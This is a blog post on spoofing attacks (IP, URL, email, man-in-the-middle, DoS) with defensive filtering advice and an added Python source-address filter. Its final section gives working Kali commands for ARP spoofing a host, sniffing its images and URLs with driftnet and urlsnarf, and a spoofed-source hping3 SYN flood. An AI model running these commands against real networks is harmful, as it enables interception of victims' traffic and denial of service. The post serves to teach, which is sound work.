Spoofing
By Abul Faeze Mohammad Bakabillah (Russell) post at Feb 09, 2020
Spoofing, in general, is a fraudulent or malicious practice in which communication is sent from an unknown source disguised as a source known to the receiver. Spoofing is most prevalent in communication mechanisms that lack a high level of security. In short, spoofing is "the false digital identity".
Internet Protocol (IP) is the protocol used for transmitting messages over the Internet; it is a network protocol operating at layer 3 of the OSI model. IP spoofing is the act of manipulating the headers in a transmitted message to mask a hacker's true identity so that the message appears to come from a trusted source.
In a Man-in-the-Middle attack, the message sent to a recipient is intercepted by a third party, which manipulates the packets and resends its own message.
A DoS attack is when an attacker floods a system with more packets than its resources can handle. This causes the system to overload and shut down. The source address is spoofed, making it difficult to track where the attacks are coming from.
IP spoofing can be prevented by monitoring packets using network monitoring software. A filtering router can also be installed; on the router, an ACL (access control list) is needed to block private addresses on your downstream interface. On the upstream interface, source addresses originating outside of the valid IP range will be blocked from sending spoofed information.
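The source-address filtering described above can be expressed as a small decision function. This is an added example, not code from the original post; the direction names, the site prefix 203.0.113.0/24 and the sample packets are assumptions made for illustration.

```python
import ipaddress

# Assumed values for illustration (not from the original post):
# 203.0.113.0/24 stands in for the site's own valid address range.
SITE_PREFIX = ipaddress.ip_network("203.0.113.0/24")
# Sources that must never arrive from the Internet side.
NEVER_FROM_OUTSIDE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # private (RFC 1918)
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",     # loopback, link-local, "this network"
    "224.0.0.0/4", "240.0.0.0/4",                     # multicast, reserved
)]

def filter_packet(direction, src):
    """Return (action, reason) for a packet's source address.

    direction: "inbound" (Internet -> site) or "outbound" (site -> Internet).
    """
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return ("drop", "malformed source address")
    if addr.version != 4:
        return ("drop", "this sketch only covers IPv4")
    if direction == "inbound":
        for net in NEVER_FROM_OUTSIDE:
            if addr in net:
                return ("drop", f"source {addr} is in non-routable range {net}")
        if addr in SITE_PREFIX:
            return ("drop", f"source {addr} claims to be inside the site")
        return ("permit", "plausible external source")
    if direction == "outbound":
        if addr not in SITE_PREFIX:
            return ("drop", f"source {addr} is outside the site range {SITE_PREFIX}")
        return ("permit", "source belongs to the site")
    raise ValueError(f"unknown direction: {direction!r}")

# Constructed sample traffic: (direction, source address).
SAMPLE_PACKETS = [
    ("inbound", "192.168.1.90"),
    ("inbound", "203.0.113.7"),
    ("inbound", "198.51.100.20"),
    ("outbound", "203.0.113.7"),
    ("outbound", "198.51.100.20"),
]

def dropped(packets):
    """Return the packets the filter would drop, with the reason."""
    return [(d, s, filter_packet(d, s)[1]) for d, s in packets
            if filter_packet(d, s)[0] == "drop"]

if __name__ == "__main__":
    for row in dropped(SAMPLE_PACKETS):
        print(row)
```

The outbound rule is the one that stops hosts on your own network from sending packets with forged source addresses.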
URL spoofing occurs when one website appears as if it is another. The URL that is displayed is not the real URL of the site, therefore the information is sent to a hidden web address.
URL spoofing is sometimes used to direct a user to a fraudulent site. Because the site has the same look and feel as the original, the user attempts to log in with a username and password. The hacker collects the username and password, then displays a password error and directs the user to the legitimate site. Using this technique, the hacker could create a series of fake websites and steal a user's private information without the user's knowledge.
Security patches are released by web browsers which add the feature of revealing the "true" URL of a site in the web browser. It is important to check if your internet browser is vulnerable and to perform the necessary updates.
Email spoofing is the act of altering the header of an email so that the email appears to be sent from someone else.
This is the simple scenario, and I try to draw it in a picture.
# echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof -i eth0 -t 192.168.1.90 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.90
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
# driftnet -i eth0
# urlsnarf -i eth0
urlsnarf will then start capturing every website address visited by the victim machine.
root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.80
So how do you know it’s working? In hping3 flood mode, we don’t check replies received (actually you can’t, because in this command we’ve used the --rand-source flag, which means the source IP address is not yours anymore).
Took me just 5 minutes to completely make this machine unresponsive (that’s the definition of DoS – Denial of Service).
In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really slow.